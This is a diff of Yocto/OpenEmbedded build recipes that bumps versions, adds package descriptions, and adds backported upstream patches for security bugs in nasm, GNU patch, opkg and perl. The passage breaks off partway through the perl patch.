- ubi-utils/ubiformat.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/ubi-utils/ubiformat.c b/ubi-utils/ubiformat.c
-index a90627c..5377b12 100644
---- a/ubi-utils/ubiformat.c
-+++ b/ubi-utils/ubiformat.c
-@@ -550,6 +550,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
- 	struct ubi_vtbl_record *vtbl;
- 	int eb1 = -1, eb2 = -1;
- 	long long ec1 = -1, ec2 = -1;
-+	int ret = -1;
- 
- 	write_size = UBI_EC_HDR_SIZE + mtd->subpage_size - 1;
- 	write_size /= mtd->subpage_size;
-@@ -643,8 +644,10 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
- 	if (!args.quiet && !args.verbose)
- 		printf("\n");
- 
--	if (novtbl)
-+	if (novtbl) {
-+		ret = 0;
- 		goto out_free;
-+	}
- 
- 	if (eb1 == -1 || eb2 == -1) {
- 		errmsg("no eraseblocks for volume table");
-@@ -669,7 +672,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
- 
- out_free:
- 	free(hdr);
--	return -1;
-+	return ret;
- }
- 
- int main(int argc, char * const argv[])
--- 
-2.27.0
-
diff --git a/meta/recipes-devtools/mtd/mtd-utils_git.bb b/meta/recipes-devtools/mtd/mtd-utils_git.bb
index d1658a739b..fa42770ee4 100644
--- a/meta/recipes-devtools/mtd/mtd-utils_git.bb
+++ b/meta/recipes-devtools/mtd/mtd-utils_git.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Tools for managing memory technology devices"
 HOMEPAGE = "http://www.linux-mtd.infradead.org/"
+DESCRIPTION = "mtd-utils tool is a generic Linux subsystem for memory devices, especially Flash devices."
 SECTION = "base"
 LICENSE = "GPLv2+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
@@ -10,18 +11,15 @@ inherit autotools pkgconfig update-alternatives
 DEPENDS = "zlib e2fsprogs util-linux"
 RDEPENDS_mtd-utils-tests += "bash"
 
-PV = "2.1.1"
+PV = "2.1.3"
 
-SRCREV = "4443221ce9b88440cd9f5bb78e6fe95621d36c8a"
-SRC_URI = "git://git.infradead.org/mtd-utils.git \
+SRCREV = "42ea7cd48d2b3c306d59bb6c530d79f8c25bf9f5"
+SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master \
            file://add-exclusion-to-mkfs-jffs2-git-2.patch \
-           file://0001-mtd-utils-Fix-return-value-of-ubiformat.patch \
-"
+           "
 
 S = "${WORKDIR}/git/"
 
-EXTRA_OECONF += "--enable-install-tests"
-
 # xattr support creates an additional compile-time dependency on acl because
 # the sys/acl.h header is needed. libacl is not needed and thus enabling xattr
 # regardless whether acl is enabled or disabled in the distro should be okay.
@@ -43,11 +41,9 @@ ALTERNATIVE_PRIORITY = "100"
 ALTERNATIVE_${PN} = "flashcp flash_eraseall flash_lock flash_unlock nanddump nandwrite"
 ALTERNATIVE_${PN}-ubifs = "ubiattach ubidetach ubimkvol ubirename ubirmvol ubirsvol ubiupdatevol"
 
-ALTERNATIVE_LINK_NAME[flash_eraseall] = "${sbindir}/flash_eraseall"
 ALTERNATIVE_LINK_NAME[nandwrite] = "${sbindir}/nandwrite"
 ALTERNATIVE_LINK_NAME[nanddump] = "${sbindir}/nanddump"
 ALTERNATIVE_LINK_NAME[ubiattach] = "${sbindir}/ubiattach"
-ALTERNATIVE_LINK_NAME[ubiattach] = "${sbindir}/ubiattach"
 ALTERNATIVE_LINK_NAME[ubidetach] = "${sbindir}/ubidetach"
 ALTERNATIVE_LINK_NAME[ubimkvol] = "${sbindir}/ubimkvol"
 ALTERNATIVE_LINK_NAME[ubirename] = "${sbindir}/ubirename"
diff --git a/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch b/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
index f788e0fd43..9f4c8dc0bd 100644
--- a/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
+++ b/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
@@ -1,4 +1,4 @@
-From bb4e42ad3a0cdd23a1d1797e6299c76b474867c0 Mon Sep 17 00:00:00 2001
+From 81d6519499dcfebe7d21e65e002a8885a4e8d852 Mon Sep 17 00:00:00 2001
 From: Joshua Watt <JPEWhacker@gmail.com>
 Date: Tue, 19 Nov 2019 13:12:17 -0600
 Subject: [PATCH] Add --debug-prefix-map option
@@ -11,7 +11,7 @@ Upstream-Status: Submitted [https://bugzilla.nasm.us/show_bug.cgi?id=3392635]
 Signed-off-by: Joshua Watt <JPEWhacker@gmail.com>
 
 ---
- asm/nasm.c              | 26 +++++++++++++++++++++++++-
+ asm/nasm.c              | 24 ++++++++++++++++++++++++
  include/nasmlib.h       |  9 +++++++++
  nasm.txt                |  4 ++++
  nasmlib/filename.c      | 20 ++++++++++++++++++++
@@ -23,34 +23,32 @@ Signed-off-by: Joshua Watt <JPEWhacker@gmail.com>
  stdlib/strlcat.c        |  2 +-
  test/elfdebugprefix.asm |  6 ++++++
  test/performtest.pl     | 12 ++++++++++--
- 12 files changed, 83 insertions(+), 10 deletions(-)
+ 12 files changed, 82 insertions(+), 9 deletions(-)
  create mode 100644 test/elfdebugprefix.asm
 
 diff --git a/asm/nasm.c b/asm/nasm.c
-index a0e1719..fc6c62e 100644
+index e5ae89a..7a7f8b4 100644
 --- a/asm/nasm.c
 +++ b/asm/nasm.c
-@@ -938,7 +938,8 @@ enum text_options {
-     OPT_LIMIT,
+@@ -939,6 +939,7 @@ enum text_options {
      OPT_KEEP_ALL,
      OPT_NO_LINE,
--    OPT_DEBUG
-+    OPT_DEBUG,
-+    OPT_DEBUG_PREFIX_MAP
+     OPT_DEBUG,
++    OPT_DEBUG_PREFIX_MAP,
+     OPT_REPRODUCIBLE
  };
  enum need_arg {
-     ARG_NO,
-@@ -970,6 +971,7 @@ static const struct textargs textopts[] = {
+@@ -971,6 +972,7 @@ static const struct textargs textopts[] = {
      {"keep-all", OPT_KEEP_ALL, ARG_NO, 0},
      {"no-line",  OPT_NO_LINE, ARG_NO, 0},
      {"debug",    OPT_DEBUG, ARG_MAYBE, 0},
 +    {"debug-prefix-map", OPT_DEBUG_PREFIX_MAP, true, 0},
+     {"reproducible", OPT_REPRODUCIBLE, ARG_NO, 0},
      {NULL, OPT_BOGUS, ARG_NO, 0}
  };
- 
-@@ -1332,6 +1334,26 @@ static bool process_arg(char *p, char *q, int pass)
-                 case OPT_DEBUG:
-                     debug_nasm = param ? strtoul(param, NULL, 10) : debug_nasm+1;
+@@ -1337,6 +1339,26 @@ static bool process_arg(char *p, char *q, int pass)
+                 case OPT_REPRODUCIBLE:
+                     reproducible = true;
                      break;
 +                case OPT_DEBUG_PREFIX_MAP: {
 +                    struct debug_prefix_list *d;
@@ -75,7 +73,7 @@ index a0e1719..fc6c62e 100644
                  case OPT_HELP:
                      help(stdout);
                      exit(0);
-@@ -2297,6 +2319,8 @@ static void help(FILE *out)
+@@ -2304,6 +2326,8 @@ static void help(FILE *out)
          "    -w-x          disable warning x (also -Wno-x)\n"
          "    -w[+-]error   promote all warnings to errors (also -Werror)\n"
          "    -w[+-]error=x promote warning x to errors (also -Werror=x)\n"
@@ -85,7 +83,7 @@ index a0e1719..fc6c62e 100644
  
      fprintf(out, "       %-20s %s\n",
 diff --git a/include/nasmlib.h b/include/nasmlib.h
-index e9bfbcc..98fc653 100644
+index 438178d..4c3e90d 100644
 --- a/include/nasmlib.h
 +++ b/include/nasmlib.h
 @@ -250,10 +250,19 @@ int64_t readstrnum(char *str, int length, bool *warn);
@@ -181,10 +179,10 @@ index 54b22f8..c4a412c 100644
  
  static void as86_cleanup(void)
 diff --git a/output/outcoff.c b/output/outcoff.c
-index bcd9ff3..15bfcf3 100644
+index 58fa024..14baf7b 100644
 --- a/output/outcoff.c
 +++ b/output/outcoff.c
-@@ -1095,14 +1095,14 @@ static void coff_symbol(char *name, int32_t strpos, int32_t value,
+@@ -1072,14 +1072,14 @@ static void coff_symbol(char *name, int32_t strpos, int32_t value,
  
  static void coff_write_symbols(void)
  {
@@ -215,7 +213,7 @@ index 61af020..1292958 100644
      nsects = sectlen = 0;
      syms = saa_init((int32_t)sizeof(struct elf_symbol));
 diff --git a/output/outieee.c b/output/outieee.c
-index 4cc0f0f..2468724 100644
+index 6d6d4b2..cdb8333 100644
 --- a/output/outieee.c
 +++ b/output/outieee.c
 @@ -207,7 +207,7 @@ static void ieee_unqualified_name(char *, char *);
@@ -228,10 +226,10 @@ index 4cc0f0f..2468724 100644
      fpubhead = NULL;
      fpubtail = &fpubhead;
 diff --git a/output/outobj.c b/output/outobj.c
-index 0d4d311..d8dd6a0 100644
+index 56b43f9..fefea94 100644
 --- a/output/outobj.c
 +++ b/output/outobj.c
-@@ -638,7 +638,7 @@ static enum directive_result obj_directive(enum directive, char *);
+@@ -644,7 +644,7 @@ static enum directive_result obj_directive(enum directive, char *);
  
  static void obj_init(void)
  {
diff --git a/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch b/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch
new file mode 100644
index 0000000000..1bd49c9fd9
--- /dev/null
+++ b/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch
@@ -0,0 +1,104 @@
+From b37677f7e40276bd8f504584bcba2c092f1146a8 Mon Sep 17 00:00:00 2001
+From: "H. Peter Anvin" <hpa@zytor.com>
+Date: Mon, 7 Nov 2022 10:26:03 -0800
+Subject: [PATCH] quote_for_pmake: fix counter underrun resulting in segfault
+
+while (nbs--) { ... } ends with nbs == -1. Rather than a minimal fix,
+introduce mempset() to make these kinds of errors less likely in the
+future.
+
+Fixes: https://bugzilla.nasm.us/show_bug.cgi?id=3392815
+Reported-by: <13579and24680@gmail.com>
+Signed-off-by: H. Peter Anvin <hpa@zytor.com>
+
+Upstream-Status: Backport
+CVE: CVE-2022-4437
+
+Reference to upstream patch:
+[https://github.com/netwide-assembler/nasm/commit/2d4e6952417ec6f08b6f135d2b5d0e19b7dae30d]
+
+Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com>
+---
+ asm/nasm.c         | 12 +++++-------
+ configure.ac       |  1 +
+ include/compiler.h |  7 +++++++
+ 3 files changed, 13 insertions(+), 7 deletions(-)
+
+diff --git a/asm/nasm.c b/asm/nasm.c
+index 7a7f8b4..675cff4 100644
+--- a/asm/nasm.c
++++ b/asm/nasm.c
+@@ -1,6 +1,6 @@
+ /* ----------------------------------------------------------------------- *
+  *
+- *   Copyright 1996-2020 The NASM Authors - All Rights Reserved
++ *   Copyright 1996-2022 The NASM Authors - All Rights Reserved
+  *   See the file AUTHORS included with the NASM distribution for
+  *   the specific copyright holders.
+  *
+@@ -814,8 +814,7 @@ static char *quote_for_pmake(const char *str)
+     }
+
+     /* Convert N backslashes at the end of filename to 2N backslashes */
+-    if (nbs)
+-        n += nbs;
++    n += nbs;
+
+     os = q = nasm_malloc(n);
+
+@@ -824,10 +823,10 @@ static char *quote_for_pmake(const char *str)
+         switch (*p) {
+         case ' ':
+         case '\t':
+-            while (nbs--)
+-                *q++ = '\\';
++            q = mempset(q, '\\', nbs);
+             *q++ = '\\';
+             *q++ = *p;
++            nbs = 0;
+             break;
+         case '$':
+             *q++ = *p;
+@@ -849,9 +848,8 @@ static char *quote_for_pmake(const char *str)
+             break;
+         }
+     }
+-    while (nbs--)
+-        *q++ = '\\';
+
++    q = mempset(q, '\\', nbs);
+     *q = '\0';
+
+     return os;
+diff --git a/configure.ac b/configure.ac
+index 39680b1..940ebe2 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -199,6 +199,7 @@ AC_CHECK_FUNCS(strrchrnul)
+ AC_CHECK_FUNCS(iscntrl)
+ AC_CHECK_FUNCS(isascii)
+ AC_CHECK_FUNCS(mempcpy)
++AC_CHECK_FUNCS(mempset)
+
+ AC_CHECK_FUNCS(getuid)
+ AC_CHECK_FUNCS(getgid)
+diff --git a/include/compiler.h b/include/compiler.h
+index db3d6d6..b64da6a 100644
+--- a/include/compiler.h
++++ b/include/compiler.h
+@@ -256,6 +256,13 @@ static inline void *mempcpy(void *dst, const void *src, size_t n)
+ }
+ #endif
+
++#ifndef HAVE_MEMPSET
++static inline void *mempset(void *dst, int c, size_t n)
++{
++    return (char *)memset(dst, c, n) + n;
++}
++#endif
++
+ /*
+  * Hack to support external-linkage inline functions
+  */
+--
+2.40.0
diff --git a/meta/recipes-devtools/nasm/nasm_2.15.03.bb b/meta/recipes-devtools/nasm/nasm_2.15.05.bb
index 5c4e28de06..c5638debdd 100644
--- a/meta/recipes-devtools/nasm/nasm_2.15.03.bb
+++ b/meta/recipes-devtools/nasm/nasm_2.15.05.bb
@@ -1,18 +1,21 @@
 SUMMARY = "General-purpose x86 assembler"
 SECTION = "devel"
+HOMEPAGE = "http://www.nasm.us/"
+DESCRIPTION = "The Netwide Assembler (NASM) is an assembler and disassembler for the Intel x86 architecture."
 LICENSE = "BSD-2-Clause"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=90904486f8fbf1861cf42752e1a39efe"
 
 SRC_URI = "http://www.nasm.us/pub/nasm/releasebuilds/${PV}/nasm-${PV}.tar.bz2 \
            file://0001-stdlib-Add-strlcat.patch \
            file://0002-Add-debug-prefix-map-option.patch \
+           file://CVE-2022-44370.patch \
            "
 
-SRC_URI[sha256sum] = "04e7343d9bf112bffa9fda86f6c7c8b120c2ccd700b882e2db9f57484b1bd778"
+SRC_URI[sha256sum] = "3c4b8339e5ab54b1bcb2316101f8985a5da50a3f9e504d43fa6f35668bee2fd0"
 
 EXTRA_AUTORECONF_append = " -I autoconf/m4"
 
-inherit autotools
+inherit autotools-brokensep
 
 BBCLASSEXTEND = "native"
 
diff --git a/meta/recipes-devtools/ninja/ninja_1.10.0.bb b/meta/recipes-devtools/ninja/ninja_1.10.0.bb
index ba3398c5d6..755b73a173 100644
--- a/meta/recipes-devtools/ninja/ninja_1.10.0.bb
+++ b/meta/recipes-devtools/ninja/ninja_1.10.0.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Ninja is a small build system with a focus on speed."
 HOMEPAGE = "https://ninja-build.org/"
+DESCRIPTION = "Ninja is a small build system with a focus on speed. It differs from other build systems in two major respects: it is designed to have its input files generated by a higher-level build system, and it is designed to run builds as fast as possible."
 LICENSE = "Apache-2.0"
 LIC_FILES_CHKSUM = "file://COPYING;md5=a81586a64ad4e476c791cda7e2f2c52e"
 
@@ -7,7 +8,7 @@ DEPENDS = "re2c-native ninja-native"
 
 SRCREV = "ed7f67040b370189d989adbd60ff8ea29957231f"
 
-SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release"
+SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release;protocol=https"
 UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)"
 
 S = "${WORKDIR}/git"
@@ -28,3 +29,6 @@ do_install() {
 }
 
 BBCLASSEXTEND = "native nativesdk"
+
+# This is a different Ninja
+CVE_CHECK_WHITELIST += "CVE-2021-4336"
diff --git a/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch b/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch
new file mode 100644
index 0000000000..bec21e67f4
--- /dev/null
+++ b/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch
@@ -0,0 +1,50 @@
+From 8b45a3c4cab95382beea1ecdddeb2e4a9ed14aba Mon Sep 17 00:00:00 2001
+From: Jo-Philipp Wich <jo@mein.io>
+Date: Wed, 1 Apr 2020 21:47:40 +0200
+Subject: [PATCH 001/104] file_util.c: fix possible bad memory access in
+ file_read_line_alloc()
+
+In the case of a zero length string being returned by fgets(), the condition
+checking for a trailing new line would perform a bad memory access outside
+of `buf`. This might happen when line with a leading null byte is read.
+
+Avoid this case by checking that the string has a length of at least one
+byte. Also change the unsigned int types to size_t to store length values
+while we're at it.
+
+Upstream-Status: Backport [https://github.com/ndmsystems/opkg/commit/8b45a3c4cab95382beea1ecdddeb2e4a9ed14aba]
+
+Signed-off-by: Jo-Philipp Wich <jo@mein.io>
+Signed-off-by: Alejandro del Castillo <alejandro.delcastillo@ni.com>
+Signed-off-by: virendra thakur <virendrak@kpit.com>
+---
+ libopkg/file_util.c | 7 ++-----
+ 1 file changed, 2 insertions(+), 5 deletions(-)
+
+diff --git a/libopkg/file_util.c b/libopkg/file_util.c
+index fbed7b4..ee9f59d 100644
+--- a/libopkg/file_util.c
++++ b/libopkg/file_util.c
+@@ -127,17 +127,14 @@ char *file_readlink_alloc(const char *file_name)
+ */
+ char *file_read_line_alloc(FILE * fp)
+ {
++    size_t buf_len, line_size;
+     char buf[BUFSIZ];
+-    unsigned int buf_len;
+     char *line = NULL;
+-    unsigned int line_size = 0;
+     int got_nl = 0;
+ 
+-    buf[0] = '\0';
+-
+     while (fgets(buf, BUFSIZ, fp)) {
+         buf_len = strlen(buf);
+-        if (buf[buf_len - 1] == '\n') {
++        if (buf_len > 0 && buf[buf_len - 1] == '\n') {
+             buf_len--;
+             buf[buf_len] = '\0';
+             got_nl = 1;
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/opkg/opkg/sourcedateepoch.patch b/meta/recipes-devtools/opkg/opkg/sourcedateepoch.patch
new file mode 100644
index 0000000000..4578fa33be
--- /dev/null
+++ b/meta/recipes-devtools/opkg/opkg/sourcedateepoch.patch
@@ -0,0 +1,24 @@
+Having CLEAN_DATE come from the current date doesn't allow for build
+reproducibility. Add the option of using SOURCE_DATE_EPOCH if set
+which for OE, it will be.
+
+Upstream-Status: Pending
+RP 2021/2/2
+
+Index: opkg-0.4.4/configure.ac
+===================================================================
+--- opkg-0.4.4.orig/configure.ac
++++ opkg-0.4.4/configure.ac
+@@ -281,7 +281,11 @@ AC_FUNC_UTIME_NULL
+ AC_FUNC_VPRINTF
+ AC_CHECK_FUNCS([memmove memset mkdir regcomp strchr strcspn strdup strerror strndup strrchr strstr strtol strtoul sysinfo utime])
+ 
+-CLEAN_DATE=`date +"%B %Y" | tr -d '\n'`
++if ! test -z "$SOURCE_DATE_EPOCH" ; then
++    CLEAN_DATE=`LC_ALL=C date -d @$SOURCE_DATE_EPOCH +"%B %Y" | tr -d '\n'`
++else
++    CLEAN_DATE=`date +"%B %Y" | tr -d '\n'`
++fi
+ 
+ AC_SUBST([CLEAN_DATE])
+ 
diff --git a/meta/recipes-devtools/opkg/opkg_0.4.2.bb b/meta/recipes-devtools/opkg/opkg_0.4.2.bb
index 66a74dc5ed..3ebc27c8ee 100644
--- a/meta/recipes-devtools/opkg/opkg_0.4.2.bb
+++ b/meta/recipes-devtools/opkg/opkg_0.4.2.bb
@@ -2,6 +2,7 @@ SUMMARY = "Open Package Manager"
 SUMMARY_libopkg = "Open Package Manager library"
 SECTION = "base"
 HOMEPAGE = "http://code.google.com/p/opkg/"
+DESCRIPTION = "Opkg is a lightweight package management system based on Ipkg."
 BUGTRACKER = "http://code.google.com/p/opkg/issues/list"
 LICENSE = "GPLv2+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f \
@@ -14,6 +15,8 @@ PE = "1"
 SRC_URI = "http://downloads.yoctoproject.org/releases/${BPN}/${BPN}-${PV}.tar.gz \
            file://opkg.conf \
            file://0001-opkg_conf-create-opkg.lock-in-run-instead-of-var-run.patch \
+           file://sourcedateepoch.patch \
+           file://0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch \
            file://run-ptest \
 "
 
@@ -48,7 +51,9 @@ EXTRA_OECONF_class-native = "--localstatedir=/${@os.path.relpath('${localstatedi
 do_install_append () {
 	install -d ${D}${sysconfdir}/opkg
 	install -m 0644 ${WORKDIR}/opkg.conf ${D}${sysconfdir}/opkg/opkg.conf
-	echo "option lists_dir ${OPKGLIBDIR}/opkg/lists" >>${D}${sysconfdir}/opkg/opkg.conf
+	echo "option lists_dir   ${OPKGLIBDIR}/opkg/lists"  >>${D}${sysconfdir}/opkg/opkg.conf
+	echo "option info_dir    ${OPKGLIBDIR}/opkg/info"   >>${D}${sysconfdir}/opkg/opkg.conf
+	echo "option status_file ${OPKGLIBDIR}/opkg/status" >>${D}${sysconfdir}/opkg/opkg.conf
 
 	# We need to create the lock directory
 	install -d ${D}${OPKGLIBDIR}/opkg
diff --git a/meta/recipes-devtools/orc/orc_0.4.31.bb b/meta/recipes-devtools/orc/orc_0.4.31.bb
index cd4dc31d70..ba2c349c9f 100644
--- a/meta/recipes-devtools/orc/orc_0.4.31.bb
+++ b/meta/recipes-devtools/orc/orc_0.4.31.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Optimised Inner Loop Runtime Compiler"
 HOMEPAGE = "http://gstreamer.freedesktop.org/modules/orc.html"
+DESCRIPTION = "Optimised Inner Loop Runtime Compiler is a Library and set of tools for compiling and executing SIMD assembly language-like programs that operate on arrays of data."
 LICENSE = "BSD-2-Clause & BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://COPYING;md5=1400bd9d09e8af56b9ec982b3d85797e"
 
diff --git a/meta/recipes-devtools/patch/patch/CVE-2019-20633.patch b/meta/recipes-devtools/patch/patch/CVE-2019-20633.patch
new file mode 100644
index 0000000000..03988a179c
--- /dev/null
+++ b/meta/recipes-devtools/patch/patch/CVE-2019-20633.patch
@@ -0,0 +1,31 @@
+From 15b158db3ae11cb835f2eb8d2eb48e09d1a4af48 Mon Sep 17 00:00:00 2001
+From: Andreas Gruenbacher <agruen@gnu.org>
+Date: Mon, 15 Jul 2019 19:10:02 +0200
+Subject: Avoid invalid memory access in context format diffs
+
+* src/pch.c (another_hunk): Avoid invalid memory access in context format
+diffs.
+
+CVE: CVE-2019-20633
+Upstream-Status: Backport[https://git.savannah.gnu.org/cgit/patch.git/patch/?id=15b158db3ae11cb835f2eb8d2eb48e09d1a4af48]
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+---
+ src/pch.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/src/pch.c b/src/pch.c
+index a500ad9..cb54e03 100644
+--- a/src/pch.c
++++ b/src/pch.c
+@@ -1328,6 +1328,7 @@ another_hunk (enum diff difftype, bool rev)
+ 		  ptrn_prefix_context = context;
+ 		ptrn_suffix_context = context;
+ 		if (repl_beginning
++		    || p_end <= 0
+ 		    || (p_end
+ 			!= p_ptrn_lines + 1 + (p_Char[p_end - 1] == '\n')))
+ 		  {
+-- 
+cgit v1.2.1
+
diff --git a/meta/recipes-devtools/patch/patch_2.7.6.bb b/meta/recipes-devtools/patch/patch_2.7.6.bb
index b5897b357a..1997af0c25 100644
--- a/meta/recipes-devtools/patch/patch_2.7.6.bb
+++ b/meta/recipes-devtools/patch/patch_2.7.6.bb
@@ -10,6 +10,7 @@ SRC_URI += "file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
             file://0001-Invoke-ed-directly-instead-of-using-the-shell.patch \
             file://0001-Don-t-leak-temporary-file-on-failed-ed-style-patch.patch \
             file://0001-Don-t-leak-temporary-file-on-failed-multi-file-ed.patch \
+            file://CVE-2019-20633.patch \
 "
 
 SRC_URI[md5sum] = "4c68cee989d83c87b00a3860bcd05600"
diff --git a/meta/recipes-devtools/patchelf/patchelf_0.10.bb b/meta/recipes-devtools/patchelf/patchelf_0.10.bb
index 84e640773b..2bf3108f88 100644
--- a/meta/recipes-devtools/patchelf/patchelf_0.10.bb
+++ b/meta/recipes-devtools/patchelf/patchelf_0.10.bb
@@ -1,12 +1,15 @@
-SRC_URI = "git://github.com/NixOS/patchelf;protocol=https \
+SUMMARY = "Tool to allow editing of RPATH and interpreter fields in ELF binaries"
+DESCRIPTION = "PatchELF is a simple utility for modifying existing ELF executables and libraries."
+HOMEPAGE = "https://github.com/NixOS/patchelf"
+
+LICENSE = "GPLv3"
+
+SRC_URI = "git://github.com/NixOS/patchelf;protocol=https;branch=master \
            file://handle-read-only-files.patch \
            file://fix-adjusting-startPage.patch \
            file://fix-phdrs.patch \
            "
 
-LICENSE = "GPLv3"
-SUMMARY = "Tool to allow editing of RPATH and interpreter fields in ELF binaries"
-
 SRCREV = "e1e39f3639e39360ceebb2f7ed533cede4623070"
 
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/perl/files/CVE-2023-31484.patch b/meta/recipes-devtools/perl/files/CVE-2023-31484.patch
new file mode 100644
index 0000000000..0fea7bf8a8
--- /dev/null
+++ b/meta/recipes-devtools/perl/files/CVE-2023-31484.patch
@@ -0,0 +1,27 @@
+CVE: CVE-2023-31484
+Upstream-Status: Backport [  import from Ubuntu  perl_5.30.0-9ubuntu0.5
+upstream  https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 9c98370287f4e709924aee7c58ef21c85289a7f0 Mon Sep 17 00:00:00 2001
+From: Stig Palmquist <git@stig.io>
+Date: Tue, 28 Feb 2023 11:54:06 +0100
+Subject: [PATCH] Add verify_SSL=>1 to HTTP::Tiny to verify https server
+ identity
+
+---
+ lib/CPAN/HTTP/Client.pm | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/cpan/CPAN/lib/CPAN/HTTP/Client.pm b/cpan/CPAN/lib/CPAN/HTTP/Client.pm
+index 4fc792c26..a616fee20 100644
+--- a/cpan/CPAN/lib/CPAN/HTTP/Client.pm
++++ b/cpan/CPAN/lib/CPAN/HTTP/Client.pm
+@@ -32,6 +32,7 @@ sub mirror {
+ 
+     my $want_proxy = $self->_want_proxy($uri);
+     my $http = HTTP::Tiny->new(
++        verify_SSL => 1,
+         $want_proxy ? (proxy => $self->{proxy}) : ()
+     );
+ 
diff --git a/meta/recipes-devtools/perl/files/CVE-2023-47038.patch b/meta/recipes-devtools/perl/files/CVE-2023-47038.patch
new file mode 100644
index 0000000000..59252c560c
--- /dev/null
+++ b/meta/recipes-devtools/perl/files/CVE-2023-47038.patch
@@ -0,0 +1,121 @@
+as per https://ubuntu.com/security/CVE-2023-47100 , CVE-2023-47100 is duplicate of CVE-2023-47038
+CVE: CVE-2023-47038 CVE-2023-47100
+Upstream-Status: Backport [ import from ubuntu perl_5.30.0-9ubuntu0.5 
+upstream https://github.com/Perl/perl5/commit/12c313ce49b36160a7ca2e9b07ad5bd92ee4a010 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+Backport of:
+
+From 12c313ce49b36160a7ca2e9b07ad5bd92ee4a010 Mon Sep 17 00:00:00 2001
+From: Karl Williamson <khw@cpan.org>
+Date: Sat, 9 Sep 2023 11:59:09 -0600
+Subject: [PATCH 1/2] Fix read/write past buffer end: perl-security#140
+
+A package name may be specified in a \p{...} regular expression
+construct.  If unspecified, "utf8::" is assumed, which is the package
+all official Unicode properties are in.  By specifying a different
+package, one can create a user-defined property with the same
+unqualified name as a Unicode one.  Such a property is defined by a sub
+whose name begins with "Is" or "In", and if the sub wishes to refer to
+an official Unicode property, it must explicitly specify the "utf8::".
+S_parse_uniprop_string() is used to parse the interior of both \p{} and
+the user-defined sub lines.
+
+In S_parse_uniprop_string(), it parses the input "name" parameter,
+creating a modified copy, "lookup_name", malloc'ed with the same size as
+"name".  The modifications are essentially to create a canonicalized
+version of the input, with such things as extraneous white-space
+stripped off.  I found it convenient to strip off the package specifier
+"utf8::".  To to so, the code simply pretends "lookup_name" begins just
+after the "utf8::", and adjusts various other values to compensate.
+However, it missed the adjustment of one required one.
+
+This is only a problem when the property name begins with "perl" and
+isn't "perlspace" nor "perlword".  All such ones are undocumented
+internal properties.
+
+What happens in this case is that the input is reparsed with slightly
+different rules in effect as to what is legal versus illegal.  The
+problem is that "lookup_name" no longer is pointing to its initial
+value, but "name" is.  Thus the space allocated for filling "lookup_name"
+is now shorter than "name", and as this shortened "lookup_name" is
+filled by copying suitable portions of "name", the write can be to
+unallocated space.
+
+The solution is to skip the "utf8::" when reparsing "name".  Then both
+"lookup_name" and "name" are effectively shortened by the same amount,
+and there is no going off the end.
+
+This commit also does white-space adjustment so that things align
+vertically for readability.
+
+This can be easily backported to earlier Perl releases.
+---
+ regcomp.c           | 17 +++++++++++------
+ t/re/pat_advanced.t |  8 ++++++++
+ 2 files changed, 19 insertions(+), 6 deletions(-)
+
+--- a/regcomp.c
++++ b/regcomp.c
+@@ -22606,7 +22606,7 @@ Perl_parse_uniprop_string(pTHX_
+      * compile perl to know about them) */
+     bool is_nv_type = FALSE;
+ 
+-    unsigned int i, j = 0;
++    unsigned int i = 0, i_zero = 0, j = 0;
+     int equals_pos = -1;    /* Where the '=' is found, or negative if none */
+     int slash_pos  = -1;    /* Where the '/' is found, or negative if none */
+     int table_index = 0;    /* The entry number for this property in the table
+@@ -22717,9 +22717,13 @@ Perl_parse_uniprop_string(pTHX_
+      * all of them are considered to be for that package.  For the purposes of
+      * parsing the rest of the property, strip it off */
+     if (non_pkg_begin == STRLENs("utf8::") && memBEGINPs(name, name_len, "utf8::")) {
+-        lookup_name +=  STRLENs("utf8::");
+-        j -=  STRLENs("utf8::");
+-        equals_pos -=  STRLENs("utf8::");
++        lookup_name += STRLENs("utf8::");
++        j           -= STRLENs("utf8::");
++        equals_pos  -= STRLENs("utf8::");
++        i_zero       = STRLENs("utf8::");   /* When resetting 'i' to reparse
++                                               from the beginning, it has to be
++                                               set past what we're stripping
++                                               off */
+     }
+ 
+     /* Here, we are either done with the whole property name, if it was simple;
+@@ -22997,7 +23001,8 @@ Perl_parse_uniprop_string(pTHX_
+ 
+             /* We set the inputs back to 0 and the code below will reparse,
